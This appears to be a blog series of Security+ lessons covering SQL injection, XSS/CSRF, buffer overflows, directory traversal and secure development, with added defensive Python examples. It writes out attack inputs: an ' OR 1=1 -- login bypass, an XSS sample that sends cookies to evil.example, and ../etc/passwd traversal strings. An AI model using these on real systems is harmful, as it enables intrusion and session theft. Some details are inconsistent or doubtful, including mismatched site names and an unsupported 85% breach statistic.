SQL injection is just a specific type of code injection. A generalized injection attack is the insertion of additional data or code through input from a client to an application, and the injected code can be of any type; the most common are SQL, HTML, XML, and LDAP injection. SQL injection is by far the most common, so that is what we will focus on in this lesson, but keep in mind that those other kinds of injection work on the same principle: untrusted input is mixed into something the application later interprets as code.

Before we discuss how an SQL injection works, it is important to know how a normal SQL query is performed. Let's pretend you wanted to log into a website. First you enter your username; I'm going to enter jason as mine. Then you enter your password; I'm going to enter my oh-so-super-secure password of pass123 for this example. With both of those entered, I click the Login button, and the web application sends my username and password to the database to verify that the username matches the password stored there. It does this with a structured query that says: select any records from the users table where the user_id = 'jason' and the password = 'pass123'. If the query finds a row with both the username jason and the password pass123, it returns that row to the web application (a real application stores a password hash rather than the plaintext password, but the logic is the same), and the web application performs whatever its next action is supposed to be; in this case it logs me in and displays the authenticated user's home page. If that username and password combination is not found in the users table, the query returns no rows, and the web application shows me some kind of message saying please enter your password again. That is how it is supposed to work.

But how does it work with an SQL injection? Let's try logging into the website again, but this time I'm going to perform an SQL injection. Back on the login page, I enter the username jason once more. Then, instead of entering my password, I enter the string delimiter, a single quote mark ('), which this lesson loosely calls the escape character, followed by the statement OR 1=1;. This obviously isn't my password; it is code I'm trying to inject into the SQL statement that the web application will send to the database when I click Login. So let's click the Login button, and look at the full SQL statement the web application generated and sent to the database: select any records from the users table where the user_id = 'jason' and the password = '' OR 1=1;'. So far the first part is the same as our earlier legitimate login attempt. What is happening in the second part? The single quote I typed closes the string literal that was supposed to hold my password, so from that point on the database stops treating my input as data and parses everything after the quote as SQL. The condition OR 1=1 is always true, and because AND binds more tightly than OR, the WHERE clause now matches every row in the users table, so the query returns records even though I never supplied a valid password. In practice the injected payload usually ends with a comment marker such as -- so that the trailing quote the application appends after our input is ignored instead of causing a syntax error; the principle is exactly the same.
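The login described above, as an added example that is not part of the original episode: a constructed in-memory SQLite users table with the jason/pass123 account, the vulnerable query built by string concatenation beside a parameterized version, and the lesson's OR 1=1 payload (with a trailing -- so the appended quote is commented out). All table and function names are assumptions made for this illustration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one account, stored in plaintext exactly
    as the lesson describes (a real application would store a password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('jason', 'pass123')")
    conn.commit()
    return conn


def build_query_vulnerable(user_id: str, password: str) -> str:
    """Builds the login query by string concatenation. Whatever the client
    typed becomes part of the SQL text, so a single quote in the input
    closes the string literal and the rest is parsed as SQL."""
    return (
        "SELECT user_id FROM users WHERE user_id = '" + user_id
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn: sqlite3.Connection, user_id: str, password: str) -> bool:
    # A row comes back whenever the WHERE clause matches anything at all.
    row = conn.execute(build_query_vulnerable(user_id, password)).fetchone()
    return row is not None


def login_safe(conn: sqlite3.Connection, user_id: str, password: str) -> bool:
    """Parameterized query: the SQL text is fixed and the values are bound
    separately, so the database never parses the input as SQL."""
    row = conn.execute(
        "SELECT user_id FROM users WHERE user_id = ? AND password = ?",
        (user_id, password),
    ).fetchone()
    return row is not None


# The lesson's payload, with a trailing comment marker so the quote the
# application appends after our input is ignored. The WHERE clause becomes:
#   user_id = 'jason' AND password = '' OR 1=1 --'
# AND binds tighter than OR, so this is (false) OR (true): every row matches.
INJECTED_PASSWORD = "' OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print(build_query_vulnerable("jason", INJECTED_PASSWORD))
    print("vulnerable, injected password:", login_vulnerable(db, "jason", INJECTED_PASSWORD))
    print("parameterized, injected password:", login_safe(db, "jason", INJECTED_PASSWORD))
```

The parameterized version is the actual fix; input filtering that merely strips quotes is not, because other encodings and contexts (numeric fields, LIKE patterns, ORDER BY) give the attacker other ways in.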

Jun 04, 2021 11:51
Two more of the most common vulnerabilities found in web applications: XSS & XSRF....


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 46. Today we are discussing the next two exploits, which are types of web application vulnerabilities. These are known as cross-site scripting (XSS) and cross-site request forgery (XSRF, also written CSRF).

Cross-site scripting occurs when an attacker embeds malicious script into a trusted website so that it runs in the browsers of that site's users. When this occurs the attacker is trying to gain elevated privileges, steal the victim's session cookies, or read other information stored by the victim's web browser. During a cross-site scripting attack the victim is the user, not the web server; the web server may itself already have been compromised, or it may simply be echoing attacker-supplied input back into its pages without cleaning it. A cross-site scripting attack exploits the trust that exists between a user's web browser and the web server they are visiting: the browser runs whatever script the page contains because it trusts the server that delivered it, and the attacker has found a way to get their own code into that page on its way from the server to the client.

There are three types of cross-site scripting attack: stored (persistent), reflected, and DOM-based. In a stored (persistent) attack, the attacker gets data they supplied saved on the web server, for example in a comment or profile field, so that it is delivered to every victim who later views that page. In a reflected attack the effect is non-persistent: the payload travels in a link, typically in a URL parameter that the server echoes back into the page, and it is activated when the victim clicks that link. A DOM-based attack exploits the victim's web browser itself and is often called client-side cross-site scripting; the name comes from the fact that the page's document object model (DOM), which is part of the browser, is modified by client-side script using attacker-controlled input, so the server may never see the payload at all.

To prevent cross-site scripting, programmers should use output encoding in their web applications, so that untrusted data is rendered as text rather than interpreted as markup or script when the page is delivered, and they should also use proper input validation so that users cannot insert HTML tags when entering information on a web form. As a user, you can help protect yourself by tightening the security settings for your cookie storage and by disabling scripting when you browse, as we discussed back in the web browser configuration lesson of the application security section.

Whereas cross-site scripting exploits the trust between a user's web browser and a website, cross-site request forgery instead exploits the trust that a website has in a user. In a cross-site request forgery, the attacker forces the user's browser to send requests to a web server the user has already authenticated to. For example, let's say you've already logged into your bank's website with your username and password. At this point you're authenticated and the website trusts you; your browser will automatically attach your session cookie to any request it makes to the bank. If an attacker can get your browser to send a command to the web server through that authenticated session, for instance by luring you to a page that contains a hidden form posting to the bank, they are forging the request to make it look like it came from you. The attacker usually cannot see the web server's response to the forged request, but they can still use it to transfer funds out of the victim's account, change the victim's password, or perform a myriad of other actions on the victim's behalf.

To prevent cross-site request forgery from being successful, programmers should require unpredictable anti-forgery tokens on web pages that contain forms (and, for sensitive actions, a CAPTCHA), use appropriate authentication and encryption, validate any XML files submitted by a user, and require the cookie value to be submitted twice, once as the cookie and once in the request body, so the server can verify that both copies match and have not been tampered with (the double-submit cookie pattern).
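Both defenses described above, as an added example that is not part of the original episode: output encoding of a constructed attacker comment (the stored XSS case) beside the unencoded rendering, and a bank transfer handler that rejects any request lacking the per-session anti-forgery token. The Session class, the form field names and the endpoint are assumptions made for this illustration; only the standard library is used.

```python
import hmac
import html
import secrets

# Constructed sample input: a comment an attacker submitted to a page that
# later shows it to other users, which tries to ship the victim's cookie away.
ATTACKER_COMMENT = '<script>location="https://evil.example/?c="+document.cookie</script>'


def render_comment_unsafe(comment: str) -> str:
    # Untrusted text is dropped straight into the page, so the browser sees a
    # real <script> element and runs it with the victim's cookies and session.
    return "<p>" + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    # Output encoding: <, >, &, " and ' become entities, so the browser shows
    # the text of the script instead of executing it.
    return "<p>" + html.escape(comment, quote=True) + "</p>"


class Session:
    """Server-side session for one logged-in user. A fresh, unguessable
    anti-forgery token is minted per session and rendered into every form."""

    def __init__(self) -> None:
        self.csrf_token = secrets.token_urlsafe(32)


def handle_transfer(session: Session, form: dict):
    """The bank's money-transfer endpoint. The browser attaches the session
    cookie automatically, so the session alone proves nothing about who built
    the request; the token does, because a third-party page cannot read it.
    Returns (status code, message)."""
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so the check itself does not leak the token.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return 403, "request rejected: missing or invalid anti-forgery token"
    return 200, f"transferred {form['amount']} to account {form['to']}"


if __name__ == "__main__":
    print(render_comment_unsafe(ATTACKER_COMMENT))
    print(render_comment_safe(ATTACKER_COMMENT))

    session = Session()
    # Forged request: the attacker's page knows the bank's form fields but
    # not the victim's token, so the browser sends only the cookie.
    print(handle_transfer(session, {"amount": "5000", "to": "attacker"}))
    # Legitimate request from the bank's own form, which carried the token.
    print(handle_transfer(session, {"amount": "50", "to": "landlord",
                                    "csrf_token": session.csrf_token}))
```

html.escape is the right encoder only for an HTML text or attribute context; data placed inside a script block, a URL or a CSS value needs the encoder for that context. Note also that a stored XSS on the bank's own site would let the attacker read the token from the page, which is why the two defenses belong together.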

Jun 03, 2021 08:18
Buffer overflows: the most common vulnerability, found in many applications in different forms...


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 45. Today we are discussing the next type of exploit we're going to cover, which is called a buffer overflow. A buffer overflow occurs when a process in a program writes data outside the memory range the developer allocated for it. Now, this begs the question: what exactly is a buffer? A buffer is simply a temporary storage area that a program uses to hold its data. Let's pretend that you have a glass sitting on a table. It can hold a certain amount of water, right? If it's designed to hold 16 ounces of liquid but you pour 20 ounces in, the glass overflows and the table gets wet. In this example the glass is our buffer, and when we overflow it with our data (in our case, water), the extra spills out onto the table and makes a huge mess. Buffer overflows in the IT world also make a big mess for us; some estimates put as many as 85% of data breaches down to a buffer overflow being used as the initial attack vector.

So, let's take a closer look at how a buffer overflow attack really works. Let's pretend you wanted to store my phone number in your contacts list. Here in the United States, phone numbers consist of ten digits: the first three are the area code, which identifies the city or region, and the last seven are the person's unique number. Before we had cell phones, you would simply pick up the phone and dial the seven digits, because the telephone company assumed you wanted to place a local call within your own area code. Now, let's pretend that the person who designed the contacts application on your phone wanted to save memory and use the smallest buffer possible, so they decided on an eight-digit buffer, assuming you don't need to store an area code because you're only going to make local calls. So, let's store my made-up phone number, 555-1234, into an eight-digit buffer called Buffer A. When I do this, you'll see that it takes up the first seven boxes, labeled zero through six, because computers always start counting at zero, like you learned back in the binary lessons. What happens, though, if we try to enter a number that's too long? Buffer A isn't the only memory buffer that your contacts application uses. Right after Buffer A in memory comes Buffer B, then Buffer C, and so on. So, let's consider how we store a longer phone number. Say you're out on vacation and meet somebody who doesn't live in your city. In this case you need to store the area code as well as the number, like 410-555-1234. Since this now includes the area code for Annapolis, Maryland, we have ten digits to store, but each buffer is only eight digits long, because our programmer didn't think through all of the different kinds of phone numbers one might need to keep in their list. So the contacts application tries to store this ten-digit number in an eight-digit buffer, and the last two digits overflow Buffer A and land in Buffer B, silently overwriting whatever was stored there. This is exactly what happens in a buffer overflow: a program that never compares the length of its input against the size of its buffer lets the excess spill into adjacent memory.

Now, why is this such a bad thing? To explain that, we have to get a little bit technical, so bear with me. Each program reserves a chunk of system memory when it runs. This gives it a place to store the data it needs during processing.
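The contacts-list example above, as an added simulation that is not part of the original episode: a flat list models the memory the application reserved, with the eight-slot Buffer A immediately followed by Buffer B. An unchecked copy (the behaviour of C's strcpy) is shown beside a length-checked one, so you can watch the two excess digits of 410-555-1234 overwrite the start of Buffer B. The buffer sizes and the neighbouring number already stored in Buffer B are assumptions chosen to match the lesson.

```python
BUFFER_SIZE = 8            # the programmer's eight-digit buffer
BUFFER_A = 0               # Buffer A occupies slots 0..7
BUFFER_B = BUFFER_SIZE     # Buffer B sits right after it, slots 8..15
EMPTY = "."


def new_memory():
    """A flat model of the memory the contacts app reserved: two adjacent buffers."""
    return [EMPTY] * (2 * BUFFER_SIZE)


def store_unchecked(memory, base, digits):
    """Copies digits starting at `base` without comparing the length to the
    buffer size, the way C's strcpy does. Excess digits land in whatever
    comes next in memory."""
    for offset, digit in enumerate(digits):
        memory[base + offset] = digit


def store_checked(memory, base, digits):
    """The fix: refuse input longer than the buffer instead of spilling."""
    if len(digits) > BUFFER_SIZE:
        raise ValueError(f"{len(digits)} digits will not fit in a {BUFFER_SIZE}-digit buffer")
    for offset, digit in enumerate(digits):
        memory[base + offset] = digit


def read_buffer(memory, base):
    return "".join(memory[base:base + BUFFER_SIZE])


def overflow_demo():
    """Returns (Buffer A, Buffer B) after the lesson's ten-digit number is
    written into the eight-digit Buffer A with no bounds check."""
    memory = new_memory()
    store_unchecked(memory, BUFFER_B, "5559876")     # a neighbour's number already in B
    store_unchecked(memory, BUFFER_A, "4105551234")  # ten digits into an eight-slot buffer
    return read_buffer(memory, BUFFER_A), read_buffer(memory, BUFFER_B)


def checked_demo():
    """Same input through the checked copy: Buffer B is left untouched and the
    caller gets an error it can handle instead of corrupted memory."""
    memory = new_memory()
    store_checked(memory, BUFFER_B, "5559876")
    try:
        store_checked(memory, BUFFER_A, "4105551234")
    except ValueError as err:
        return read_buffer(memory, BUFFER_B), str(err)
    return read_buffer(memory, BUFFER_B), "no error"


if __name__ == "__main__":
    a, b = overflow_demo()
    print("Buffer A:", a)   # 41055512  (only eight digits fit)
    print("Buffer B:", b)   # 3459876.  (the '34' overwrote the neighbour's number)
    print(checked_demo())
```

In a real process the slot after the buffer is not another phone number but return addresses, saved registers or heap metadata, which is why the same mistake in C turns from a corrupted contact into code execution; Python itself bounds-checks every list index, so the unchecked copy here would raise rather than overflow if `memory` were too short.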

Jun 02, 2021 14:38
Common types of vulnerabilities and exploits that can be found in software products...


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 44. Today we are discussing software vulnerabilities and exploits. Now that we've covered how software should be securely coded, let's cover a few of the exploits that are used against improperly coded programs.

First, we have backdoors. A backdoor is software code placed in a computer program to bypass its normal authentication and other security mechanisms. Backdoors are often created by the developers themselves to make it easier for them to update or support custom programs in the future, but this is a horrible practice in terms of security: anyone who discovers the backdoor gets the same bypass the developer built for themselves. All secure coding and programming methodologies consider backdoors a poor coding practice and state that they should never be used by programmers, and because of this most developers have phased out their use. Backdoors can also be created in our systems by attackers: for example, if a system is infected with a remote access Trojan, that Trojan is also considered a backdoor into the system.

The next type of exploit we have is called a directory traversal, which exploits insecurely coded web applications and servers. A directory traversal is a method of accessing unauthorized directories by moving through the directory structure on a remote server. Let's pretend, for example, that my website Diontraining.com was poorly coded and was subject to this type of exploit. Of course, we've gone ahead and secured our website against this type of vulnerability, so this is just a theoretical discussion to explain the context of a directory traversal. Normally, you could access our website by going to www.kicktraveller.weebly.com, or you might access a dynamic sub-page such as diontraining.com/menus, or something like that. To attempt a directory traversal, you add something to an input variable in the URL that carries a directory path, something like menu=../../../../etc/passwd. Each ../ moves up one level, so this attempts to climb four levels from the web server's public folder up to the root of the file system and then back down into the etc folder, where it tries to read the passwd file. If this succeeded, the text-based passwd file would be displayed in your web browser. On a modern Linux system the password hashes themselves live in /etc/shadow, which only root can read, but /etc/passwd still lists every account on the box, and the same technique can fetch configuration files, source code, or anything else the web server process is allowed to read. Any time you see a series of ../ in a request, you should suspect that a directory traversal is being attempted as part of an exploit; attackers also encode the sequence, for example as %2e%2e%2f, to slip past naive filters.

Often a directory traversal is used to read a file on a web server, and sometimes it can be chained into arbitrary code execution on that server. Arbitrary code execution occurs when an attacker is able to execute or run commands of their choosing on a victim computer. This might occur if someone walks by your desk at work, sees that you're logged into the computer but away from your desk, and starts running a program on it; that would be classified as arbitrary code execution. This is pretty bad for security, as you can imagine, but what's even worse is a specialized type of arbitrary code execution called RCE, or remote code execution. A remote code execution occurs when the attacker is able to execute or run commands on a remote computer. Notice the key difference between arbitrary and remote code execution: with a remote code execution the attacker can run the commands remotely, such as through an interactive shell session or some other kind of attack, without ever physically touching the machine.
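The traversal defense and the ../ detection described above, as an added example that is not part of the original episode: a resolver that maps the client-supplied menu value onto an assumed document root and refuses anything that escapes it after decoding and normalisation, plus a small detector run over constructed access-log lines in the style of the lesson's URL. The document root, parameter name and log lines are assumptions made for this illustration.

```python
import posixpath
from urllib.parse import unquote

PUBLIC_ROOT = "/var/www/public"   # assumed document root for this example


def resolve_under_root(root: str, requested: str) -> str:
    """Maps a client-supplied path onto the document root and refuses anything
    that, once normalised, lands outside it. Percent-decoding happens first so
    %2e%2e%2f is seen as ../ rather than sneaking past the check."""
    root = posixpath.normpath(root)
    decoded = unquote(requested)
    full = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        raise PermissionError(f"path escapes document root: {requested!r}")
    return full


def is_traversal_attempt(value: str) -> bool:
    """Cheap detector for request logs: a ../ or ..\\ sequence in a parameter
    value, including its percent-encoded forms."""
    decoded = unquote(value)
    return "../" in decoded or "..\\" in decoded


# Constructed sample access-log lines in the style of the lesson's URL.
SAMPLE_LOG = [
    "GET /?menu=menus/lunch.html HTTP/1.1",
    "GET /?menu=../../../../etc/passwd HTTP/1.1",
    "GET /?menu=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1",
    "GET /?menu=specials/today.html HTTP/1.1",
]


def flag_traversal_lines(lines):
    """Returns the log lines whose menu parameter looks like a traversal."""
    flagged = []
    for line in lines:
        path = line.split(" ")[1]
        value = path.split("menu=", 1)[1] if "menu=" in path else ""
        if is_traversal_attempt(value):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    print(resolve_under_root(PUBLIC_ROOT, "menus/lunch.html"))
    for attempt in ("../../../../etc/passwd", "%2e%2e%2f%2e%2e%2fetc%2fpasswd"):
        try:
            resolve_under_root(PUBLIC_ROOT, attempt)
        except PermissionError as err:
            print("blocked:", err)
    for line in flag_traversal_lines(SAMPLE_LOG):
        print("suspicious:", line)
```

Two caveats for a real server: normpath works on the string only, so a symlink inside the document root can still point outside it (resolve with os.path.realpath against the live file system before opening), and a request that is double-encoded (%252e) survives a single unquote, so decode until the value stops changing, or reject anything still containing a percent sign.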

Jun 01, 2021 12:29
Testing methods for software products..


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 43. Today we are discussing the different testing methods that you may use to help your organization's developers secure their code. Most security analysts are not programmers themselves, so the Security+ exam isn't focused on the specific types of code review like pair programming, over-the-shoulder reviews, and others. Instead, this episode focuses on just a handful of testing methods that an entry-level security analyst might conduct.

The first type of testing is known as system testing, which comes in three varieties: black-box testing, white-box testing, and gray-box testing. Black-box testing occurs when the tester is not given any information about the system or program before beginning the test. For example, if I created a program and wanted you to conduct this type of test, I might simply hand you a copy of the executable on a disk; it's then up to you to figure out how it functions, how to bypass any security I may have coded into it, and whether you can crash it by entering incorrect input. Essentially you start testing without any sense of what the program does or how it works; as a tester you are blind to begin with, and you discover your way around the program or system through the testing itself. White-box testing is the exact opposite: the tester is given the details of the inner workings of the program or system, which may even include access to the full source code, diagrams of the system, user access credentials, logons, and more. The third type is gray-box testing, a mixture of black-box and white-box, where the tester is given some amount of information about the system and conducts the test as if they don't have full access to it. For example, a gray-box tester might be given user-level credentials to test a system, but not administrative credentials. If you're testing a network, you may be given some information such as the IP addresses of the devices, but not the version of the software running on each one.

As part of these system tests, you're often attempting to break the system by stressing it or by triggering an exception. It's important that programmers have coded their applications to fail securely, and to verify this you purposely create error conditions and watch how the system reacts. If the error occurs while the program is running, it is known as a runtime error. If the program fails to run at all because of a coding mistake, that is known as a syntax error, so called because the most common cause is a programmer not following the syntax the language expects, such as leaving out a closing parenthesis or a semicolon. As a security analyst you're much more likely to encounter a runtime error than a syntax error, because you're testing these things in a live environment. When you create an error, also known as an exception, the application needs a way to handle it properly: catch it, record the details of what caused it somewhere the developers can read, and return a generic message to the user rather than a stack trace or database error that hands an attacker information about the internals.
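The "fail securely" behaviour described above, as an added example that is not part of the original episode: a request handler whose database lookup raises a runtime error, written once the leaky way (the exception and stack trace go back to the client) and once the secure way (details go to an internal log under an incident id, the client sees only the id and a generic message). The orders table, the in-memory log list and the handler names are assumptions made for this illustration; the error is produced by querying a table that was never created.

```python
import logging
import sqlite3
import traceback

log = logging.getLogger("app")
INTERNAL_LOG = []   # constructed in-memory sink standing in for the server log


def lookup_order(order_id):
    """Handler body. The in-memory database has no orders table at all, so the
    query raises a runtime error the way a broken deployment would."""
    conn = sqlite3.connect(":memory:")
    return conn.execute("SELECT total FROM orders WHERE id = ?", (order_id,)).fetchone()


def handle_request_leaky(order_id):
    """Fails open: the raw exception text (table names, query fragments, file
    paths and stack frames) goes straight back to the client."""
    try:
        return 200, str(lookup_order(order_id))
    except Exception as err:
        return 500, f"Error: {err}\n{traceback.format_exc()}"


def handle_request_secure(order_id):
    """Fails securely: full details are recorded internally with an incident
    id, and the client gets only that id and a generic message."""
    try:
        return 200, str(lookup_order(order_id))
    except Exception as err:
        incident_id = f"inc-{len(INTERNAL_LOG) + 1:04d}"
        INTERNAL_LOG.append({
            "id": incident_id,
            "order_id": order_id,
            "error": repr(err),
            "trace": traceback.format_exc(),
        })
        log.error("%s while looking up order %r: %r", incident_id, order_id, err)
        return 500, f"Something went wrong. Quote reference {incident_id} when contacting support."


if __name__ == "__main__":
    print(handle_request_leaky("42"))
    print(handle_request_secure("42"))
    print(INTERNAL_LOG[-1]["error"])
```

The incident id is what lets support correlate the user's report with the internal record; it carries no information about the failure itself, which is the point.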

May 31, 2021 13:30
Principles of the SDLC we need to know for secure coding practices....


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 43. Today we are discussing the security principles to keep in mind as we move through the seven phases of the software development life cycle; it's important for us not to forget the fundamentals of good security. Our developers should always remember the three tenets of the CIA triad: confidentiality, integrity, and availability. Remember, confidentiality ensures that only authorized users can access the data being processed by an application. The most common way of ensuring confidentiality is to use encryption to maintain the secrecy of the data being stored or transmitted. Integrity is focused on ensuring that data is not modified or altered without permission. The two main ways developers do this are by using hash algorithms as an integrity check on the data, and by using journaling and logging functions to create an audit trail showing that the integrity of the data has not been compromised. When developers are attempting to ensure availability, they're focused on making sure the data is available to authorized users when it's needed. The most common ways of doing this are building redundancy into the overall system design, keeping the software code as free of errors as possible, and making sure the software handles errors appropriately so that it does not crash.

During the testing phase, it's important to conduct an in-depth code review to ensure that there are no vulnerabilities that might affect the confidentiality, integrity, or availability of the software or the integrated system. These code reviews are generally performed by programmers, not by security analysts. Security analysts do help during the software development life cycle, though, by conducting threat modeling. Threat modeling helps prioritize vulnerability identification and patching throughout the SDLC. By prioritizing the threats, the security analyst helps identify which applications or systems should receive additional protection, which threats are most likely to affect them, and which ones have known vulnerabilities. Based on this, additional effort and funding can be applied in the most efficient way to fix the issues before an attack happens or an attacker can exploit them. After all, there are a lot of threats out there and a lot of ways to attack a system if you want to breach one leg of the CIA triad.

To best protect applications, we should ensure that good security is designed in from the beginning, back in the requirements, analysis, design, and implementation phases. Numerous studies have shown that it's much cheaper to use secure coding practices and to test more thoroughly before releasing a product than to try to fix insecure code after release, let alone to clean up the mess after an attack. So what secure coding practices should our programmers use during development? First, we should design our applications around the concept of least privilege. Least privilege means that users and processes should run with the least amount of access necessary to perform a given function. Does your application require administrative permissions to run? If so, why? Developers should always try to use the lowest permission level that lets a function work, so whenever possible the program should run as a regular user-level account instead of as an administrator or root.

May 29, 2021 19:02
Commonly used software development models for building software products...


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 42. Today we are discussing software development, which is the topic of this section of the course. When a piece of software is created, it requires a lot of work. Each and every function performed by that software has to be written to do its intended job, which often requires the work of dozens of programmers and hundreds of thousands of lines of code. Often, when a bug is found in a piece of software, I hear people ask why the company didn't figure it out before the software was released. Well, there are lots of different ways to conduct software testing, and we're going to talk about them later in this section, but bugs still find their way into code because our software is so complex these days. Take, for example, the Windows 10 operating system. It consists of over 50 million lines of code and involved hundreds of different programmers. With that much complexity, there's always a chance that an error will be introduced into the code base.

To try to counteract the complexity of software development, many models and methods have been introduced, the most common of which is known as the software development life cycle, or SDLC. The software development life cycle is an organized process for developing a secure software application across its whole life, covering everything from the initial idea for the software, through its coding and testing, and on into its deployment and retirement. The software development life cycle is based on a generic Waterfall model of development: each phase of the life cycle is broken down into smaller portions, and as each one is finished, the next one begins. The reason this model is called the Waterfall is that information and the software product itself flow from the top stage all the way down to the bottom stage, getting more developed as they progress downward. Visually this looks like a waterfall, as shown in the example on the screen. Different organizations use different phases or stages in their software development life cycle, but for our purposes you need to know seven phases. Now, let's cover each of these seven.

The first phase is planning and analysis. During this stage the goals of the software project are determined, the stakeholder needs are assessed, and all of the high-level planning work is conducted. Essentially, this is where things go from a rough idea someone had for a piece of software into a more formalized and well-developed concept that we can plan the rest of our development cycle against. Once all the requirements have been gathered, we move into the phase known as software or systems design. During this stage the application or system is defined, outlined, and diagrammed in detail; essentially, this is where we focus on the overarching inputs and outputs of each function that will make up the final software released to our customer. At this point we still haven't written any code. That brings us to the third phase, implementation, in which programmers begin to code all of the various functions needed for the final product. As each piece of code is developed, the programmers do some basic debugging and testing to ensure its functionality works properly, but at this point no formal testing has been completed. The fourth phase is reserved for that formalized testing of the application; it's during this phase that we take the code and check it using a myriad of different testing methodologies.

May 28, 2021 18:39